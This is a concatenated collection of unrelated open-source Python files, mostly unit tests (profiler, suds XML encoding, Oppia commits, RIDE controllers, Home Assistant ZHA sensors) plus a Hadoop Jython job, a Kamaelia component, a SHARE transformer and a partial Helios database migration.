profilee.py:35(factorial) -> profilee.py:35(factorial)(20) 169.917
profilee.py:48(mul)(20) 19.980
profilee.py:48(mul) ->
profilee.py:55(helper) -> profilee.py:73(helper1)(4) 119.964
profilee.py:84(helper2_indirect)(2) 139.946
profilee.py:88(helper2)(6) 399.912
profilee.py:73(helper1) -> :0(append)(4) -0.004
profilee.py:84(helper2_indirect) -> profilee.py:35(factorial)(2) 169.917
profilee.py:88(helper2)(2) 399.912
profilee.py:88(helper2) -> :0(hasattr)(8) 11.964
profilee.py:98(subhelper)(8) 79.960
profilee.py:98(subhelper) -> profilee.py:110(__getattr__)(16) 27.972"""
if __name__ == "__main__":
main()
| harmy/kbengine | kbe/res/scripts/common/Lib/test/test_profile.py | Python | lgpl-3.0 | 7,166 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
#
# sax encoding/decoding test.
#
from suds.sax.element import Element
from suds.sax.parser import Parser
def basic():
xml = "<a>Me && <b>my</b> shadow's <i>dog</i> love to 'play' and sing "la,la,la";</a>"
p = Parser()
d = p.parse(string=xml)
a = d.root()
print('A(parsed)=\n%s' % a)
assert str(a) == xml
b = Element('a')
b.setText('Me && <b>my</b> shadow\'s <i>dog</i> love to \'play\' and sing "la,la,la";')
print('B(encoded)=\n%s' % b)
assert str(b) == xml
print('A(text-decoded)=\n%s' % a.getText())
print('B(text-decoded)=\n%s' % b.getText())
assert a.getText() == b.getText()
print('test pruning')
j = Element('A')
j.set('n', 1)
j.append(Element('B'))
print(j)
j.prune()
print(j)
def cdata():
xml = '<a><![CDATA[<b>This is my &<tag></b>]]></a>'
p = Parser()
d = p.parse(string=xml)
print(d)
a = d.root()
print(a.getText())
if __name__ == '__main__':
#basic()
cdata()
| USGM/suds | tests/saxenc.py | Python | lgpl-3.0 | 1,896 |
# coding: utf-8
#
# Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for recent commit controllers."""
from __future__ import annotations
from core import feconf
from core.platform import models
from core.tests import test_utils
(exp_models,) = models.Registry.import_models([models.NAMES.exploration])
class RecentCommitsHandlerUnitTests(test_utils.GenericTestBase):
"""Test the RecentCommitsHandler class."""
def setUp(self):
super(RecentCommitsHandlerUnitTests, self).setUp()
self.signup(self.MODERATOR_EMAIL, self.MODERATOR_USERNAME)
self.set_moderators([self.MODERATOR_USERNAME])
self.signup(self.VIEWER_EMAIL, self.VIEWER_USERNAME)
self.committer_1_id = self.get_user_id_from_email(self.VIEWER_EMAIL)
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
self.committer_2_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
commit1 = exp_models.ExplorationCommitLogEntryModel.create(
'entity_1', 0, self.committer_1_id, 'create',
'created first commit', [], 'public', True)
commit2 = exp_models.ExplorationCommitLogEntryModel.create(
'entity_1', 1, self.committer_2_id, 'edit', 'edited commit', [],
'public', True)
commit3 = exp_models.ExplorationCommitLogEntryModel.create(
'entity_2', 0, self.committer_1_id, 'create',
'created second commit', [], 'private', False)
commit1.exploration_id = 'exp_1'
commit2.exploration_id = 'exp_1'
commit3.exploration_id = 'exp_2'
commit1.update_timestamps()
commit1.put()
commit2.update_timestamps()
commit2.put()
commit3.update_timestamps()
commit3.put()
def test_get_recent_commits(self):
"""Test that this method should return all nonprivate commits."""
self.login(self.MODERATOR_EMAIL)
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertEqual(len(response_dict['results']), 2)
self.assertDictContainsSubset(
{'username': self.VIEWER_USERNAME, 'exploration_id': 'exp_1',
'post_commit_status': 'public', 'version': 0,
'commit_message': 'created first commit',
'commit_type': 'create'},
response_dict['results'][1])
self.assertDictContainsSubset(
{'username': self.NEW_USER_USERNAME, 'exploration_id': 'exp_1',
'post_commit_status': 'public', 'version': 1,
'commit_message': 'edited commit',
'commit_type': 'edit'},
response_dict['results'][0])
self.logout()
def test_get_recent_commits_explorations(self):
"""Test that the response dict contains the correct exploration."""
self.login(self.MODERATOR_EMAIL)
self.save_new_default_exploration(
'exp_1', 'owner0', title='MyExploration')
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertEqual(len(response_dict['exp_ids_to_exp_data']), 1)
self.assertEqual(
response_dict['exp_ids_to_exp_data']['exp_1']['title'],
'MyExploration')
self.logout()
def test_get_recent_commits_three_pages_with_cursor(self):
self.login(self.MODERATOR_EMAIL)
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertFalse(response_dict['more'])
for i in range(feconf.COMMIT_LIST_PAGE_SIZE * 2):
entity_id = 'my_entity_%s' % i
exp_id = 'exp_%s' % i
commit_i = exp_models.ExplorationCommitLogEntryModel.create(
entity_id, 0, self.committer_2_id, 'create', 'created commit',
[], 'public', True)
commit_i.exploration_id = exp_id
commit_i.update_timestamps()
commit_i.put()
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'all_non_private_commits'})
self.assertEqual(
len(response_dict['results']), feconf.COMMIT_LIST_PAGE_SIZE)
self.assertTrue(response_dict['more'])
cursor = response_dict['cursor']
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={
'query_type': 'all_non_private_commits',
'cursor': cursor
})
self.assertEqual(
len(response_dict['results']),
feconf.COMMIT_LIST_PAGE_SIZE)
self.assertTrue(response_dict['more'])
cursor = response_dict['cursor']
response_dict = self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={
'query_type': 'all_non_private_commits',
'cursor': cursor
})
self.assertFalse(response_dict['more'])
self.assertEqual(len(response_dict['results']), 2)
self.logout()
def test_get_recent_commits_with_invalid_query_type_returns_404_status(
self):
self.login(self.MODERATOR_EMAIL)
self.get_json(
feconf.RECENT_COMMITS_DATA_URL,
params={'query_type': 'invalid_query_type'},
expected_status_int=404)
self.logout()
| brianrodri/oppia | core/controllers/recent_commits_test.py | Python | apache-2.0 | 6,058 |
import unittest
from robotide.controller.filecontrollers import ResourceFileControllerFactory
class ResourceFileControllerFactoryTestCase(unittest.TestCase):
def setUp(self):
namespace = lambda:0
project = lambda:0
self._resource_file_controller_factory = ResourceFileControllerFactory(namespace, project)
def test_is_all_resource_imports_resolved(self):
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
self._resource_file_controller_factory.set_all_resource_imports_resolved()
self.assertTrue(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
self._resource_file_controller_factory.set_all_resource_imports_unresolved()
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
def test_all_resource_imports_is_unresolved_when_new_resource_is_added(self):
self._resource_file_controller_factory.set_all_resource_imports_resolved()
data = lambda:0
data.source = 'source'
data.directory = 'directory'
self._resource_file_controller_factory.create(data)
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
    def test_all_resource_imports_is_unresolved_when_resource_is_removed(self):
self._resource_file_controller_factory.set_all_resource_imports_resolved()
resu = lambda:0
self._resource_file_controller_factory._resources.append(resu)
self._resource_file_controller_factory.remove(resu)
self.assertFalse(self._resource_file_controller_factory.is_all_resource_file_imports_resolved())
if __name__ == '__main__':
unittest.main()
| fingeronthebutton/RIDE | utest/controller/test_resourcefilecontrollerfactory.py | Python | apache-2.0 | 1,771 |
import demowlcutils
from demowlcutils import ppxml, WLC_login
from pprint import pprint as pp
from jnpr.wlc import WirelessLanController as WLC
wlc = WLC(host='a', user='b', password='c')
r = wlc.RpcMaker( target='vlan', name='Jeremy')
# you can access the following attributes, refer to the jnpr.wlc.builder
# file for more details
# r.cmd
# r.target
# r.args
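
# A minimal sketch of inspecting those attributes (the values in the
# comments below are assumptions, not guaranteed output):
print(r.cmd)     # RPC command verb, e.g. 'get'
print(r.target)  # 'vlan'
print(r.args)    # remaining keyword args, e.g. {'name': 'Jeremy'}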
| trmccart/py-jnprwlc | examples/maker.py | Python | apache-2.0 | 369 |
#
# Copyright 2006 The Apache Software Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from org.apache.hadoop.fs import Path
from org.apache.hadoop.io import *
from org.apache.hadoop.mapred import *
from org.apache.hadoop.abacus import *
from java.util import *;
import sys
class AbacusMapper(ValueAggregatorMapper):
def map(self, key, value, output, reporter):
ValueAggregatorMapper.map(self, key, value, output, reporter);
class AbacusReducer(ValueAggregatorReducer):
def reduce(self, key, values, output, reporter):
ValueAggregatorReducer.reduce(self, key, values, output, reporter);
class AbacusCombiner(ValueAggregatorCombiner):
def reduce(self, key, values, output, reporter):
ValueAggregatorCombiner.reduce(self, key, values, output, reporter);
def printUsage(code):
print "Abacus <input> <output> <numOfReducers> <inputformat> <specfile>"
sys.exit(code)
def main(args):
if len(args) < 6:
printUsage(1);
inDir = args[1];
outDir = args[2];
numOfReducers = int(args[3]);
theInputFormat = args[4];
specFile = args[5];
print "numOfReducers: ", numOfReducers, "theInputFormat: ", theInputFormat, "specFile: ", specFile
conf = JobConf(AbacusMapper);
conf.setJobName("recordcount");
conf.addDefaultResource(Path(specFile));
if theInputFormat=="textinputformat":
conf.setInputFormat(TextInputFormat);
else:
conf.setInputFormat(SequenceFileInputFormat);
conf.setOutputFormat(TextOutputFormat);
conf.setMapOutputKeyClass(Text);
conf.setMapOutputValueClass(Text);
conf.setOutputKeyClass(Text);
conf.setOutputValueClass(Text);
conf.setNumMapTasks(1);
conf.setNumReduceTasks(numOfReducers);
conf.setMapperClass(AbacusMapper);
conf.setCombinerClass(AbacusCombiner);
conf.setReducerClass(AbacusReducer);
conf.setInputPath(Path(args[1]))
conf.setOutputPath(Path(args[2]))
JobClient.runJob(conf);
if __name__ == "__main__":
main(sys.argv)
| moreus/hadoop | hadoop-0.11.2/src/contrib/abacus/examples/pyAbacus/JythonAbacus.py | Python | apache-2.0 | 2,577 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
#
import Axon
from Axon.Ipc import producerFinished, shutdownMicroprocess
class Chooser(Axon.Component.component):
"""Chooses items out of a set, as directed by commands sent to its inbox
Emits the first item at initialisation, then whenever a command is received
it emits another item (unless you're asking it to step beyond the start or
end of the set)
"""
Inboxes = { "inbox" : "receive commands",
"control" : ""
}
Outboxes = { "outbox" : "emits chosen items",
"signal" : ""
}
def __init__(self, items = [], loop = False):
"""Initialisation.
items = set of items that can be iterated over. Must be finite.
If an iterator is supplied, it is enumerated into a list during initialisation.
"""
super(Chooser,self).__init__()
self.items = list(items)
self.index = 0
self.loop = loop
def shutdown(self):
if self.dataReady("control"):
message = self.recv("control")
if isinstance(message, shutdownMicroprocess):
self.send(message, "signal")
return True
return False
def main(self):
try:
self.send( self.items[self.index], "outbox")
except IndexError:
pass
done = False
while not done:
yield 1
while self.dataReady("inbox"):
                msg = self.recv("inbox")
if msg == "SAME":
pass
elif msg == "NEXT":
self.index = self.index + 1
if self.index >= len(self.items):
if self.loop:
self.index = 0
else:
self.index = len(self.items)-1
elif msg == "PREV":
self.index = self.index - 1
if self.index < 0:
if self.loop:
self.index = len(self.items)-1
else:
self.index = 0
elif msg == "FIRST":
self.index = 0
elif msg == "LAST":
self.index = 1
try:
self.send( self.items[self.index], "outbox")
except IndexError:
pass
done = self.shutdown()
__kamaelia_components__ = ( Chooser, )
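
# A minimal interactive harness -- a sketch assuming the standard Kamaelia
# Console utilities (ConsoleReader/ConsoleEchoer), the Pipeline chassis and
# PureTransformer are installed alongside Axon. Type NEXT/PREV/FIRST/LAST/SAME
# on stdin and the currently chosen item is echoed back.
if __name__ == "__main__":
    from Kamaelia.Util.Console import ConsoleReader, ConsoleEchoer
    from Kamaelia.Util.PureTransformer import PureTransformer
    from Kamaelia.Chassis.Pipeline import Pipeline

    Pipeline(
        ConsoleReader(),
        PureTransformer(lambda line: line.strip()),   # "NEXT\n" -> "NEXT"
        Chooser(items=["red", "green", "blue"], loop=True),
        PureTransformer(lambda item: "%s\n" % item),  # make chosen items printable
        ConsoleEchoer(),
    ).run()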
| sparkslabs/kamaelia_ | Sketches/MPS/Random/MSChooser.py | Python | apache-2.0 | 3,281 |
from share.transform.chain import * # noqa
class AgentIdentifier(Parser):
uri = IRI(ctx)
class WorkIdentifier(Parser):
uri = IRI(ctx)
class Tag(Parser):
name = ctx
class ThroughTags(Parser):
tag = Delegate(Tag, ctx)
class Person(Parser):
given_name = ParseName(ctx.creator).first
family_name = ParseName(ctx.creator).last
additional_name = ParseName(ctx.creator).middle
suffix = ParseName(ctx.creator).suffix
class Creator(Parser):
agent = Delegate(Person, ctx)
cited_as = ctx.creator
order_cited = ctx('index')
class Organization(Parser):
name = ctx.publisher
identifiers = Map(Delegate(AgentIdentifier), ctx.issn)
class Publisher(Parser):
agent = Delegate(Organization, ctx)
class Extra:
publication_name = ctx.publicationName
class Article(Parser):
title = ctx.title
description = ctx.abstract
rights = ctx.copyright
date_published = ParseDate(ctx.publicationDate)
date_updated = ParseDate(ctx.publicationDate)
identifiers = Map(
Delegate(WorkIdentifier),
ctx.doi,
ctx.identifier,
Map(ctx.value, ctx.url),
)
related_agents = Concat(
Map(Delegate(Creator), ctx.creators),
Map(Delegate(Publisher), ctx)
)
tags = Map(Delegate(ThroughTags), ctx.genre)
class Extra:
openaccess = ctx.openaccess
ending_page = Try(ctx.endingPage)
issue_type = Try(ctx.issuetype)
number = ctx.number
starting_page = ctx.startingPage
topicalCollection = Try(ctx.topicalCollection)
journalid = Try(ctx.journalid)
issn = Try(ctx.issn)
class BioMedCentralTransformer(ChainTransformer):
VERSION = 1
root_parser = Article
| CenterForOpenScience/SHARE | share/transformers/com_biomedcentral.py | Python | apache-2.0 | 1,752 |
"""Test zha sensor."""
from unittest import mock
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.clusters.homeautomation as homeautomation
import zigpy.zcl.clusters.measurement as measurement
import zigpy.zcl.clusters.smartenergy as smartenergy
from homeassistant.components.sensor import DOMAIN
import homeassistant.config as config_util
from homeassistant.const import (
ATTR_UNIT_OF_MEASUREMENT,
CONF_UNIT_SYSTEM,
CONF_UNIT_SYSTEM_IMPERIAL,
CONF_UNIT_SYSTEM_METRIC,
POWER_WATT,
STATE_UNAVAILABLE,
STATE_UNKNOWN,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
UNIT_PERCENTAGE,
)
from homeassistant.helpers import restore_state
from homeassistant.util import dt as dt_util
from .common import (
async_enable_traffic,
async_test_rejoin,
find_entity_id,
send_attribute_report,
send_attributes_report,
)
async def async_test_humidity(hass, cluster, entity_id):
"""Test humidity sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 1000, 2: 100})
assert_state(hass, entity_id, "10.0", UNIT_PERCENTAGE)
async def async_test_temperature(hass, cluster, entity_id):
"""Test temperature sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 2900, 2: 100})
assert_state(hass, entity_id, "29.0", TEMP_CELSIUS)
async def async_test_pressure(hass, cluster, entity_id):
"""Test pressure sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 1000, 2: 10000})
assert_state(hass, entity_id, "1000", "hPa")
await send_attributes_report(hass, cluster, {0: 1000, 20: -1, 16: 10000})
assert_state(hass, entity_id, "1000", "hPa")
async def async_test_illuminance(hass, cluster, entity_id):
"""Test illuminance sensor."""
await send_attributes_report(hass, cluster, {1: 1, 0: 10, 2: 20})
assert_state(hass, entity_id, "1.0", "lx")
async def async_test_metering(hass, cluster, entity_id):
"""Test metering sensor."""
await send_attributes_report(hass, cluster, {1025: 1, 1024: 12345, 1026: 100})
assert_state(hass, entity_id, "12345.0", "unknown")
async def async_test_electrical_measurement(hass, cluster, entity_id):
"""Test electrical measurement sensor."""
with mock.patch(
(
"homeassistant.components.zha.core.channels.homeautomation"
".ElectricalMeasurementChannel.divisor"
),
new_callable=mock.PropertyMock,
) as divisor_mock:
divisor_mock.return_value = 1
await send_attributes_report(hass, cluster, {0: 1, 1291: 100, 10: 1000})
assert_state(hass, entity_id, "100", POWER_WATT)
await send_attributes_report(hass, cluster, {0: 1, 1291: 99, 10: 1000})
assert_state(hass, entity_id, "99", POWER_WATT)
divisor_mock.return_value = 10
await send_attributes_report(hass, cluster, {0: 1, 1291: 1000, 10: 5000})
assert_state(hass, entity_id, "100", POWER_WATT)
await send_attributes_report(hass, cluster, {0: 1, 1291: 99, 10: 5000})
assert_state(hass, entity_id, "9.9", POWER_WATT)
@pytest.mark.parametrize(
"cluster_id, test_func, report_count",
(
(measurement.RelativeHumidity.cluster_id, async_test_humidity, 1),
(measurement.TemperatureMeasurement.cluster_id, async_test_temperature, 1),
(measurement.PressureMeasurement.cluster_id, async_test_pressure, 1),
(measurement.IlluminanceMeasurement.cluster_id, async_test_illuminance, 1),
(smartenergy.Metering.cluster_id, async_test_metering, 1),
(
homeautomation.ElectricalMeasurement.cluster_id,
async_test_electrical_measurement,
1,
),
),
)
async def test_sensor(
hass,
zigpy_device_mock,
zha_device_joined_restored,
cluster_id,
test_func,
report_count,
):
"""Test zha sensor platform."""
zigpy_device = zigpy_device_mock(
{
1: {
"in_clusters": [cluster_id, general.Basic.cluster_id],
"out_cluster": [],
"device_type": 0x0000,
}
}
)
cluster = zigpy_device.endpoints[1].in_clusters[cluster_id]
zha_device = await zha_device_joined_restored(zigpy_device)
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
await async_enable_traffic(hass, [zha_device], enabled=False)
await hass.async_block_till_done()
# ensure the sensor entity was created
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and devices
await async_enable_traffic(hass, [zha_device])
# test that the sensor now have a state of unknown
assert hass.states.get(entity_id).state == STATE_UNKNOWN
# test sensor associated logic
await test_func(hass, cluster, entity_id)
# test rejoin
await async_test_rejoin(hass, zigpy_device, [cluster], (report_count,))
def assert_state(hass, entity_id, state, unit_of_measurement):
"""Check that the state is what is expected.
This is used to ensure that the logic in each sensor class handled the
attribute report it received correctly.
"""
hass_state = hass.states.get(entity_id)
assert hass_state.state == state
assert hass_state.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == unit_of_measurement
@pytest.fixture
def hass_ms(hass):
"""Hass instance with measurement system."""
async def _hass_ms(meas_sys):
await config_util.async_process_ha_core_config(
hass, {CONF_UNIT_SYSTEM: meas_sys}
)
await hass.async_block_till_done()
return hass
return _hass_ms
@pytest.fixture
def core_rs(hass_storage):
"""Core.restore_state fixture."""
def _storage(entity_id, uom, state):
now = dt_util.utcnow().isoformat()
hass_storage[restore_state.STORAGE_KEY] = {
"version": restore_state.STORAGE_VERSION,
"key": restore_state.STORAGE_KEY,
"data": [
{
"state": {
"entity_id": entity_id,
"state": str(state),
"attributes": {ATTR_UNIT_OF_MEASUREMENT: uom},
"last_changed": now,
"last_updated": now,
"context": {
"id": "3c2243ff5f30447eb12e7348cfd5b8ff",
"user_id": None,
},
},
"last_seen": now,
}
],
}
return
return _storage
@pytest.mark.parametrize(
"uom, raw_temp, expected, restore",
[
(TEMP_CELSIUS, 2900, 29, False),
(TEMP_CELSIUS, 2900, 29, True),
(TEMP_FAHRENHEIT, 2900, 84, False),
(TEMP_FAHRENHEIT, 2900, 84, True),
],
)
async def test_temp_uom(
uom,
raw_temp,
expected,
restore,
hass_ms,
core_rs,
zigpy_device_mock,
zha_device_restored,
):
"""Test zha temperature sensor unit of measurement."""
entity_id = "sensor.fake1026_fakemodel1026_004f3202_temperature"
if restore:
core_rs(entity_id, uom, state=(expected - 2))
hass = await hass_ms(
CONF_UNIT_SYSTEM_METRIC if uom == TEMP_CELSIUS else CONF_UNIT_SYSTEM_IMPERIAL
)
zigpy_device = zigpy_device_mock(
{
1: {
"in_clusters": [
measurement.TemperatureMeasurement.cluster_id,
general.Basic.cluster_id,
],
"out_cluster": [],
"device_type": 0x0000,
}
}
)
cluster = zigpy_device.endpoints[1].temperature
zha_device = await zha_device_restored(zigpy_device)
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
if not restore:
await async_enable_traffic(hass, [zha_device], enabled=False)
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and devices
await async_enable_traffic(hass, [zha_device])
# test that the sensors now have a state of unknown
if not restore:
assert hass.states.get(entity_id).state == STATE_UNKNOWN
await send_attribute_report(hass, cluster, 0, raw_temp)
await hass.async_block_till_done()
state = hass.states.get(entity_id)
assert state is not None
assert round(float(state.state)) == expected
assert state.attributes[ATTR_UNIT_OF_MEASUREMENT] == uom
async def test_electrical_measurement_init(
hass, zigpy_device_mock, zha_device_joined,
):
"""Test proper initialization of the electrical measurement cluster."""
cluster_id = homeautomation.ElectricalMeasurement.cluster_id
zigpy_device = zigpy_device_mock(
{
1: {
"in_clusters": [cluster_id, general.Basic.cluster_id],
"out_cluster": [],
"device_type": 0x0000,
}
}
)
cluster = zigpy_device.endpoints[1].in_clusters[cluster_id]
zha_device = await zha_device_joined(zigpy_device)
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
# allow traffic to flow through the gateway and devices
await async_enable_traffic(hass, [zha_device])
# test that the sensor now have a state of unknown
assert hass.states.get(entity_id).state == STATE_UNKNOWN
await send_attributes_report(hass, cluster, {0: 1, 1291: 100, 10: 1000})
assert int(hass.states.get(entity_id).state) == 100
channel = zha_device.channels.pools[0].all_channels["1:0x0b04"]
assert channel.divisor == 1
assert channel.multiplier == 1
# update power divisor
await send_attributes_report(hass, cluster, {0: 1, 1291: 20, 0x0403: 5, 10: 1000})
assert channel.divisor == 5
assert channel.multiplier == 1
assert hass.states.get(entity_id).state == "4.0"
await send_attributes_report(hass, cluster, {0: 1, 1291: 30, 0x0605: 10, 10: 1000})
assert channel.divisor == 10
assert channel.multiplier == 1
assert hass.states.get(entity_id).state == "3.0"
# update power multiplier
await send_attributes_report(hass, cluster, {0: 1, 1291: 20, 0x0402: 6, 10: 1000})
assert channel.divisor == 10
assert channel.multiplier == 6
assert hass.states.get(entity_id).state == "12.0"
await send_attributes_report(hass, cluster, {0: 1, 1291: 30, 0x0604: 20, 10: 1000})
assert channel.divisor == 10
assert channel.multiplier == 20
assert hass.states.get(entity_id).state == "60.0"
| titilambert/home-assistant | tests/components/zha/test_sensor.py | Python | apache-2.0 | 10,606 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'VoterFile.voter_file_content'
db.add_column('helios_voterfile', 'voter_file_content', self.gf('django.db.models.fields.TextField')(null=True), keep_default=False)
# Changing field 'VoterFile.voter_file'
db.alter_column('helios_voterfile', 'voter_file', self.gf('django.db.models.fields.files.FileField')(max_length=250, null=True))
def backwards(self, orm):
# Deleting field 'VoterFile.voter_file_content'
db.delete_column('helios_voterfile', 'voter_file_content')
# User chose to not deal with backwards NULL issues for 'VoterFile.voter_file'
raise RuntimeError("Cannot reverse this migration. 'VoterFile.voter_file' and its values cannot be restored.")
models = {
'helios_auth.user': {
'Meta': {'unique_together': "(('user_type', 'user_id'),)", 'object_name': 'User'},
'admin_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'info': ('helios_auth.jsonfield.JSONField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'token': ('helios_auth.jsonfield.JSONField', [], {'null': 'True'}),
'user_id': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'user_type': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'helios.auditedballot': {
'Meta': {'object_name': 'AuditedBallot'},
'added_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'election': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Election']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'raw_vote': ('django.db.models.fields.TextField', [], {}),
'vote_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'helios.castvote': {
'Meta': {'object_name': 'CastVote'},
'cast_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invalidated_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'quarantined_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'released_from_quarantine_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'verified_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'vote': ('helios.datatypes.djangofield.LDObjectField', [], {}),
'vote_hash': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'vote_tinyhash': ('django.db.models.fields.CharField', [], {'max_length': '50', 'unique': 'True', 'null': 'True'}),
'voter': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios.Voter']"})
},
'helios.election': {
'Meta': {'object_name': 'Election'},
'admin': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['helios_auth.User']"}),
'archived_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'cast_url': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'complaint_period_ends_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'datatype': ('django.db.models.fields.CharField', [], {'default': "'legacy/Election'", 'max_length': '250'}),
'description': ('django.db.models.fields.TextField', [], {}),
'election_type': ('django.db.models.fields.CharField', [], {'default': "'election'", 'max_length': '250'}),
'eligibility': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'encrypted_tally': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'featured_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'frozen_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '250'}),
'openreg': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'private_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'private_p': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'public_key': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'questions': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'registration_starts_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'result': ('helios.datatypes.djangofield.LDObjectField', [], {'null': 'True'}),
'result_proof': ('helios_auth.jsonfield.JSONField', [], {'null': 'True'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'tallies_combined_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'tallying_finished_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'tallying_started_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'tallying_starts_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'use_advanced_audit_features': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'use_voter_aliases': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'voters_hash': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'voting_ended_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'voting_ends_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'voting_extended_until': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
